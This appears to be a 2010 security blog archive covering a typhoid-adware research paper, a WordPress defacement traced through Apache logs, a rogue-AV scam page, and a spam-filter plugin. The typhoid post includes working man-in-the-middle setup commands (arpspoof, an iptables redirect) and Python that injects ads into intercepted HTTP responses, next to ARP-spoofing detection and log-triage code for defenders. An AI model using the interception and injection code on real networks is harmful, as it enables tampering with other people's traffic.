goto: malwarecity.com;

On July 7, 2010, in BitDefender, by catalin

You have to go to malwarecity.com


Typhoid Adware

On June 15, 2010, in Antispam, Malware, by catalin

Paper by Daniel Medeiros Nunes de Castro, Eric Lin, John Aycock, and Mea Wang, presented at EICAR 2010.

Abstract: The typical strategy for adware authors is to install their software on as many machines as possible and, for each affected machine, display advertisements to the user(s) of that computer. In this paper we present a different model: typhoid adware. Typhoid adware is more covert, displaying advertisements on computers that do not have the adware installed. We prove that this is a viable adware model with three proof-of-concept implementations and discuss possible defenses, for which we have two proof-of-concept implementations.

How it works:

Let’s say you are in a coffee shop enjoying a tall cappuccino and using the wireless service provided for free by the café. Normally, the traffic to and from the Internet passes through the access point. Let’s further suppose that I’m infected with a new piece of adware (probably picked up from P2P file-sharing sites or sites that provide cracks and serial numbers). This new and brilliant piece of adware will convince the laptops of the other people sitting in the coffee shop to communicate through my computer rather than directly with the access point. Once it manages to do so, each time they access a web page, my adware will insert advertisements into the page before delivering it to their computers. On the other hand, the adware will not do anything on my PC, so I’ll never know I’m infected; basically, I’m just the carrier. Hence the name: typhoid adware.

Obviously this type of attack falls into the category of man-in-the-middle attacks, but the article goes into more specific details. (By the way, the article is very well written. I really enjoyed reading it, especially the cool history lessons regarding typhoid fever.)

The first step is to convince the other computers that you are the access point, i.e. that the gateway’s IP address maps to your MAC address. The process is described in the paper, but you can also find a short description on Wikipedia: http://en.wikipedia.org/wiki/ARP_spoofing

Setup: ARP spoofing to intercept and hijack connections, using the arpspoof program from the dsniff package. A simple HTTP proxy implementation (a Python app, TinyProxy) to which the content-modification feature is added. All HTTP traffic (TCP port 80) is redirected to a local port served by the modified proxy. The redirection is done with Network Address Translation (NAT) rules on the malicious node, using Netfilter/iptables on Linux.

Further on, the paper describes three proof-of-concept implementations:

1. intercept and modify HTML code before serving it to the victim (endless possibilities of what you can do here)

2. Video modification (requires you to download the entire video first)

3. Streaming Video modification (niceeee)
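Here is what the content-modification step of the first proof of concept looks like in code. This is an added example, not the paper’s implementation: it assumes the proxy has already read a complete HTTP response from the origin server and rewrites it before relaying it to the victim; the ad snippet and the sample response are constructed. The plumbing on the carrier machine described above is, in order: enable forwarding (sysctl -w net.ipv4.ip_forward=1), poison the victim’s ARP cache (arpspoof -i eth0 -t VICTIM GATEWAY), and redirect port 80 to the proxy (iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080), with the proxy listening on 8080.

```python
"""Content-modification step of a typhoid-style HTTP proxy (proof of concept 1).

Added example, not code from the paper.  It assumes the proxy has already read a
complete HTTP/1.x response from the origin server and rewrites it before relaying
it to the victim.  AD_SNIPPET and SAMPLE_RESPONSE are constructed for this example.
"""

AD_SNIPPET = b'<div id="ad">Injected by the carrier machine</div>'  # constructed

# Constructed origin response, as the proxy would see it on the wire.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Content-Length: 52\r\n"
    b"\r\n"
    b"<html><body><p>hello from the cafe</p></body></html>"
)

_HTML_TYPES = (b"text/html", b"application/xhtml+xml")


def _split_response(raw):
    """Split a raw response into (status line, [(name, value)], body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete HTTP response: no header terminator")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def _header(headers, name):
    """Case-insensitive header lookup; None when absent."""
    for n, v in headers:
        if n.lower() == name.lower():
            return v
    return None


def inject_ad(raw_response, snippet=AD_SNIPPET):
    """Return the response with `snippet` inserted just before </body>.

    The response is passed through unchanged when it is not HTML, when it is
    compressed or chunked (the proxy would have to decode those first), or when
    it has no </body>.  Content-Length is recomputed so the victim's browser does
    not hang waiting for bytes that never arrive.
    """
    status_line, headers, body = _split_response(raw_response)
    ctype = _header(headers, b"Content-Type") or b""
    if not any(t in ctype for t in _HTML_TYPES):
        return raw_response
    if _header(headers, b"Content-Encoding") not in (None, b"identity"):
        return raw_response
    if (_header(headers, b"Transfer-Encoding") or b"").lower() == b"chunked":
        return raw_response
    idx = body.lower().rfind(b"</body>")   # lower() keeps byte offsets stable
    if idx < 0:
        return raw_response
    new_body = body[:idx] + snippet + body[idx:]
    kept = [(n, v) for n, v in headers if n.lower() != b"content-length"]
    kept.append((b"Content-Length", str(len(new_body)).encode()))
    head = b"\r\n".join([status_line] + [n + b": " + v for n, v in kept])
    return head + b"\r\n\r\n" + new_body


if __name__ == "__main__":
    print(inject_ad(SAMPLE_RESPONSE).decode())
```

The three pass-through checks are the part a quick hack usually gets wrong: corrupting a gzip body or a chunked stream, or leaving the old Content-Length, makes the victim’s browser show broken pages or hang, which is exactly the kind of symptom that gets an otherwise covert carrier noticed.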

The article ends with a list of possible defenses: heuristic analysis of ARP packets, static IP-to-MAC mapping tables, the adoption of IPv6, ARP spoofing detection built into firewall software, and even a new network-configuration setting called “Internet café”.
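Two of those defenses, the static IP-to-MAC table and heuristic analysis of ARP replies, are simple enough to sketch. The following is an added example, not one of the paper’s two proof-of-concept defenses: the addresses and the sequence of ARP replies are constructed, and the watcher is fed (sender IP, sender MAC) pairs as a sniffer on the same segment would deliver them.

```python
"""ARP-spoofing detection heuristics of the kind the paper lists as defenses.

Added example, not the paper's defense code.  STATIC_BINDINGS and SAMPLE_REPLIES
are constructed.  Two checks run on every ARP reply seen on the segment:
  * a static table for hosts that must never move (here, the gateway);
  * a heuristic that flags an IP whose MAC changes, and a MAC that starts
    claiming several IPs (the attacker's card answering for gateway and victim).
"""
from collections import defaultdict

# Bindings an administrator would pin; the gateway is the one that matters.
STATIC_BINDINGS = {"192.168.1.1": "00:11:22:33:44:01"}

# Constructed ARP replies: two legitimate announcements, then the attacker
# (MAC ...:ff) claiming first the gateway's IP and then the victim's.
SAMPLE_REPLIES = [
    ("192.168.1.1", "00:11:22:33:44:01"),
    ("192.168.1.20", "00:11:22:33:44:14"),
    ("192.168.1.1", "00:11:22:33:44:FF"),
    ("192.168.1.20", "00:11:22:33:44:FF"),
]


class ArpWatcher:
    """Tracks sender-IP -> sender-MAC announcements and raises alerts."""

    def __init__(self, static_bindings=None):
        self.static = {ip: mac.lower() for ip, mac in (static_bindings or {}).items()}
        self.seen = {}                      # ip -> last MAC announced for it
        self.ips_by_mac = defaultdict(set)  # mac -> IPs it has claimed so far
        self.alerts = []

    def observe(self, sender_ip, sender_mac):
        """Feed one ARP reply; return the alerts it triggered (possibly none)."""
        mac = sender_mac.lower()
        new = []
        pinned = self.static.get(sender_ip)
        if pinned is not None and pinned != mac:
            new.append(("static-mismatch", sender_ip, mac))
        prev = self.seen.get(sender_ip)
        if prev is not None and prev != mac:
            new.append(("mac-changed", sender_ip, prev + "->" + mac))
        self.seen[sender_ip] = mac
        claimed = self.ips_by_mac[mac]
        if claimed and sender_ip not in claimed:
            new.append(("mac-claims-multiple-ips", mac, sorted(claimed | {sender_ip})))
        claimed.add(sender_ip)
        self.alerts.extend(new)
        return new


def run_detection(replies=SAMPLE_REPLIES, static=STATIC_BINDINGS):
    """Run the watcher over a reply sequence and return all alerts raised."""
    watcher = ArpWatcher(static)
    for ip, mac in replies:
        watcher.observe(ip, mac)
    return watcher.alerts


if __name__ == "__main__":
    for alert in run_detection():
        print(alert)
```

The static table is the stronger of the two checks, since the heuristic only fires once an existing binding changes and says nothing about a host that was poisoned before the watcher started. On a café network the clients’ own bindings change legitimately as DHCP leases come and go, so pin only the gateway.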

And that’s about it. Good read!


New WP theme

On June 9, 2010, in Personal, by catalin

Everyone in favor?

Been browsing all day and this one integrates well with previous posts. I think I’ll keep it :)

Anybody else receiving this massive spam wave regarding new messages on Twitter?

(obviously, do not open that URL)

 

Just got my blog defaced this Monday

On June 9, 2010, in WP hacks, by catalin

I’m not a blogger, although it sounds fancy to be one. I just keep this blog up to gather spam comments (for some reason, spam bots enjoy this blog and I get a lot of fresh new samples every day).

Anyway, this Monday I received a lot of emails from friends saying “ha ha, you got your blog defaced!” (btw, thanks for the emails everybody. I rarely visit my blog, so I would probably have noticed next week). What could I say… me? You sure? I’m a targeted victim now? Wow… I’m famous :D .

Well, they were right, this is what I saw when I entered my blog….. :D

So, after replacing the index.php with an empty index, I started to check the apache logs to see what happened.

Turns out that, if you bing for “ip:208.109.78.139 powered by wordpress” like the bad guys did (http://www.bing.com/search?q=ip%3a208.109.78.139+powered+by+wordpress&go=&scope=web&qs=n&sk=&sc=1-39&first=31&FORM=PERE2) you will get all the wordpress blogs hosted at that IP, which turns out to be a godaddy server according to the whois information.

So, now that they know this blog is a WordPress blog hosted on a GoDaddy server, let’s see what the Apache logs indicate:

"GET blog.catalincosoi.com/wp-content/themes/2/style.css HTTP/1.1"
"GET blog.catalincosoi.com/ HTTP/1.1"
"GET blog.catalincosoi.com/wp-content/themes/2/print.css HTTP/1.1"
"GET blog.catalincosoi.com/wp-content/themes/2/img/header.jpg HTTP/1.1"
"GET blog.catalincosoi.com/favicon.ico HTTP/1.1"
"GET blog.catalincosoi.com/wp-login.php HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/css/login.css?ver=20091010 HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/css/colors-fresh.css?ver=20091217 HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/button-grad.png HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/logo-login.gif HTTP/1.1"
"GET blog.catalincosoi.com/favicon.ico HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/button-grad-active.png HTTP/1.1"
"POST blog.catalincosoi.com/wp-login.php HTTP/1.1"
"GET blog.catalincosoi.com/wp-includes/js/thickbox/thickbox.css?ver=20090514 HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/load-styles.php?c=1&dir=ltr&load=dashboard,plugin-install,global,wp-admin&ver=17aa35fdf22036c3f75256fc16b16184 HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/ HTTP/1.1"
"GET blog.catalincosoi.com/wp-includes/images/blank.gif HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/media-button-image.gif HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/wpspin_light.gif HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/media-button-video.gif HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/media-button-music.gif HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/media-button-other.gif HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/load-scripts.php?c=1&load=jquery,utils,quicktags&ver=b64ae9a301a545332f1fcd4c6c5351b4 HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/wp-logo.gif HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/fav.png HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/visit-site-button-grad.gif HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/fav-arrow.gif HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/menu.png HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/load-scripts.php?c=1&load=hoverIntent,common,jquery-color,wp-ajax-response,wp-lists,jquery-ui-core,jquery-ui-resizable,admin-comments,jquery-ui-sortable,postbox,dashboard,plugin-install,thickbox,media-upload&ver=e7dd2696b99d6664702753286996fc2d HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/menu-bits.gif HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/menu-dark.gif HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/menu-arrows.gif HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/screen-options-left.gif HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/screen-options-right.gif HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/gray-grad.png HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/white-grad.png HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/icons32.png HTTP/1.1"
"GET blog.catalincosoi.com/wp-includes/js/thickbox/loadingAnimation.gif HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/index-extra.php?jax=dashboard_incoming_links HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/index-extra.php?jax=dashboard_primary HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/index-extra.php?jax=dashboard_secondary HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/index-extra.php?jax=dashboard_plugins HTTP/1.1"
"GET blog.catalincosoi.com/wp-includes/js/thickbox/thickbox.css?ver=20090514 HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/themes.php HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/load-styles.php?c=1&dir=ltr&load=global,wp-admin&ver=4198bec071152ccaf39ba26fd81dcd63 HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/load-scripts.php?c=1&load=jquery,utils&ver=d24248fe4b0cd62086633fd42ef1019b HTTP/1.1"
"GET blog.catalincosoi.com/wp-content/themes/3/screenshot.png HTTP/1.1"
"GET blog.catalincosoi.com/wp-content/themes/connections/screenshot.png HTTP/1.1"
"GET blog.catalincosoi.com/wp-content/themes/bluehorizon/screenshot.png HTTP/1.1"
"GET blog.catalincosoi.com/wp-content/themes/2/screenshot.png HTTP/1.1"
"GET blog.catalincosoi.com/wp-content/themes/classic/screenshot.png HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/load-scripts.php?c=1&load=hoverIntent,common,jquery-color,thickbox,theme-preview&ver=7cccc49e3f8148675288b56f5fb521e5 HTTP/1.1"
"GET blog.catalincosoi.com/wp-content/themes/1/screenshot.png HTTP/1.1"
"GET blog.catalincosoi.com/wp-content/themes/default/screenshot.png HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/theme-editor.php HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/load-styles.php?c=1&dir=ltr&load=theme-editor,global,wp-admin&ver=82cd6abb819d7fe96521a25504995eeb HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/load-scripts.php?c=1&load=hoverIntent,common,jquery-color&ver=975a66473369e28f12fa81a4deb3836d HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/theme-editor.php?file=/themes/2/index.php&theme=blackview&dir=theme HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/images/button-grad-active.png HTTP/1.1"
"POST blog.catalincosoi.com/wp-admin/theme-editor.php HTTP/1.1"
"GET blog.catalincosoi.com/wp-admin/theme-editor.php?file=/home/content/c/a/t/catalinus/html/blog/wp-content/themes/2/index.php&theme=blackview&a=te&scrollto=12331 HTTP/1.1"
"GET blog.catalincosoi.com/wp-login.php?action=logout&_wpnonce=f7ab117f9b HTTP/1.1"
"GET blog.catalincosoi.com/wp-login.php?loggedout=true HTTP/1.1"

If I’m reading this correctly, it happened like this:

  1. search for wordpress blogs hosted at that godaddy address
  2. log in
  3. modify the theme’s index.php
  4. log out

Which means 3 things:

  1. I am not the only victim (bing for the same IP + the hackers name and you can find other defaced blogs)
  2. They knew my (and the others) password -> will look further into this one!!!!
  3. I’m not that famous

Obviously, since they had admin access, they could have done whatever they wanted besides just defacing.
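For anyone who wants to triage their own logs for the same pattern, here is an added example (not the blog author’s own analysis): it parses Apache combined-format lines and reports clients that logged in (a POST to wp-login.php answered with a 302 redirect, which is what WordPress returns on a successful login) and then POSTed to the theme or plugin editor. The post only shows request lines, so the sample log is constructed, with invented client addresses and timestamps, following the order of requests above.

```python
"""Triage of Apache access logs for the login-then-edit-theme pattern.

Added example, not the blog author's analysis script.  SAMPLE_LOG is
constructed in Apache combined format (invented IPs from documentation
ranges, invented timestamps) and mirrors the sequence of requests in the
post, plus a benign visitor for contrast.
"""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

SAMPLE_LOG = """\
198.51.100.9 - - [07/Jun/2010:09:12:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Jun/2010:09:14:30 +0000] "GET /wp-login.php HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Jun/2010:09:14:41 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Jun/2010:09:14:42 +0000] "GET /wp-admin/ HTTP/1.1" 200 30110 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Jun/2010:09:15:05 +0000] "GET /wp-admin/themes.php HTTP/1.1" 200 18000 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Jun/2010:09:15:20 +0000] "GET /wp-admin/theme-editor.php?file=/themes/2/index.php&theme=blackview&dir=theme HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Jun/2010:09:15:48 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Jun/2010:09:15:55 +0000] "GET /wp-login.php?action=logout HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# In-dashboard file editors; a POST here rewrites PHP on disk.
EDITOR_PATHS = ("/wp-admin/theme-editor.php", "/wp-admin/plugin-editor.php")


def parse_log(text):
    """Yield one dict per parseable combined-format line; skip the rest."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def find_login_then_edit(text):
    """Return (hits, login_attempts).

    hits:           {ip: [editor paths POSTed to after a successful login]}
    login_attempts: {ip: number of POSTs to wp-login.php}, so a single
                    attempt followed by a redirect (credentials already
                    known) can be told apart from a brute-force run.
    """
    logged_in = set()
    login_attempts = defaultdict(int)
    hits = defaultdict(list)
    for r in parse_log(text):
        path = r["path"].split("?", 1)[0]
        if r["method"] == "POST" and path.endswith("/wp-login.php"):
            login_attempts[r["ip"]] += 1
            if r["status"] == "302":
                logged_in.add(r["ip"])
        elif r["method"] == "POST" and path in EDITOR_PATHS and r["ip"] in logged_in:
            hits[r["ip"]].append(path)
    return dict(hits), dict(login_attempts)


if __name__ == "__main__":
    found, attempts = find_login_then_edit(SAMPLE_LOG)
    for ip, paths in found.items():
        print(ip, "logged in after", attempts[ip], "attempt(s) and edited:", paths)
```

The login-attempt counter is the check worth having: one POST followed by a redirect means the credentials were already known, not guessed on the spot. Once the theme editor has been used this way, adding define('DISALLOW_FILE_EDIT', true); to wp-config.php removes the in-dashboard theme and plugin editors entirely, so a stolen admin password no longer turns straight into PHP on disk.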

Now I have to find out where they got the passwords from. I googled for “godaddy server hacked” and found plenty of links to start from, but they all state that GoDaddy isn’t very helpful…. I’ll send them an email as well.

So… disappointed that I wasn’t the targeted [famous] victim, I’ll start searching for a new WP theme (it was about time to change it, I sort of got bored of all that black) and will also see what exactly happened with these passwords.
Will be back!

PS: also created a new category :D


We’ve been busy

On May 31, 2010, in Antispam, Blog Spam, by catalin


Project Page: labs.bitdefender.com

This is an experimental solution for filtering blog comments for spam. The analysis is done on a remote server, where each comment is run through a series of filters. Depending on the total score, the comment is classified as spam or legitimate.

We are very happy that we finally have something that can be tested, and we need your help. All we ask is that, if you are a blogger, you try our solution for a couple of days (or for as long as you like) and see how it works out for you.

For any questions and/or suggestions, email to asblog@labs.bitdefender.com or if you learned about this project from this blog, you can also add comments directly here :)

Installation:

  • from WordPress Dashboard/Plugins select Add New
  • select Upload and browse to the plugin
  • install and activate
  • enter a valid e-mail in the BitDefender Client ID field

If that fails, try uploading the plugin via FTP into the plugins directory and activating it manually.

I’m working on a slidecast about this which will probably be available this Wednesday.


Trojan.FakeAlert.5 Update issue

On March 21, 2010, in BitDefender, by catalin

If you are a Windows 64-bit user and a BitDefender customer, and you have been experiencing problems with your computer since yesterday (20 March 2010), it would be a very good idea to visit this URL: http://www.bitdefender.com/site/KnowledgeBase/consumer/#638

Due to a recent update for Windows 64-bit systems it is possible that BitDefender detects several Windows and BitDefender files as infected with Trojan.FakeAlert.5 .

As a result, in some instances BitDefender and/or Windows no longer worked properly (the PC failed to boot, or certain applications stopped working).

To solve the issue, please follow the instructions below:

– If you are using Windows Vista click here
– If you are using Windows 7 click here
– If you are using Windows XP click here


… and another [Skype Spam]

On February 16, 2010, in Antispam, Malware, by catalin

Domain ID:D158376320-LROR
Domain Name:UPDATEFM.ORG

Created On:16-Feb-2010 12:41:27 UTC
Last Updated On:16-Feb-2010 12:41:29 UTC
Expiration Date:16-Feb-2011 12:41:27 UTC
Sponsoring Registrar:eNom, Inc. (R39-LROR)

would it be … a rogue AV?

Some random code from the HTML source:

for(i=0;i<4;i++) { $("#warn_"+i).my_hide(); }            // hide the four "infection" warnings until the fake scan reaches them
//$(".ch_bg").animate({width:"415px"},scen_time*1000);   // (already commented out in the page) progress-bar animation
percentTic = setInterval(doUpdatePercents,scen_time*10);  // timer driving the fake scan percentage
warnTic = setInterval(doShowWarns,scen_time*250);         // timer revealing the warnings one by one
blinkTic = setInterval(doBlink,1000);                     // timer blinking an element once per second

Cool stuff! :)
